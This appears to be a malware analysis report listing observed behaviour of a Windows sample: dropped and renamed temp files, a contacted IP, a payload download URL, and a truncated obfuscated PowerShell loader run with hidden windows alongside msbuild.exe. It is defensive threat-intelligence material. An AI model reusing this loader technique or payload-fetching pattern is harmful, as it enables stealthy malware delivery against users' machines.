Technical Information
- %APPDATA%\bit6853.tmp
- %APPDATA%\bit8ff0.tmp
- %APPDATA%\bit6853.tmp
- %APPDATA%\bit8ff0.tmp
- from %APPDATA%\bit6853.tmp to %APPDATA%\slrhales.amn
- from %APPDATA%\bit8ff0.tmp to %APPDATA%\slrhales.amn
- '64.##2.85.135':80
- http://64.##2.85.135/Paavirkede.thn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Sdgrdenska;function Beluring ($Sprtni, $Registerti, $Thom) {$Sprtni.'Substring'($Registerti, $Thom);}Function Underemp9 ([String]$Comm){For($Rorsbusgad=5; $Rorsbusgad -lt $Comm.Length-$Voltig...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Sdgrdenska;function Beluring ($Sprtni, $Registerti, $Thom) {$Sprtni.'Substring'($Registerti, $Thom);}Function Underemp9 ([String]$Comm){For($Rorsbusgad=5; $Rorsbusgad -lt $Comm.Length-$Voltig...
- '<SYSTEM32>\cmd.exe' /c "ping localhost"
- '<SYSTEM32>\ping.exe' localhost
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "$Sdgrdenska;function Beluring ($Sprtni, $Registerti, $Thom) {$Sprtni.'Substring'($Registerti, $Thom);}Function Underemp9 ([String]$Comm){For($Rorsbusgad=5; $Rorsbusgad -lt $Comm.Length-$Voltig...
- '%WINDIR%\syswow64\cmd.exe' /c "ping localhost"
- '%WINDIR%\syswow64\ping.exe' localhost
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe'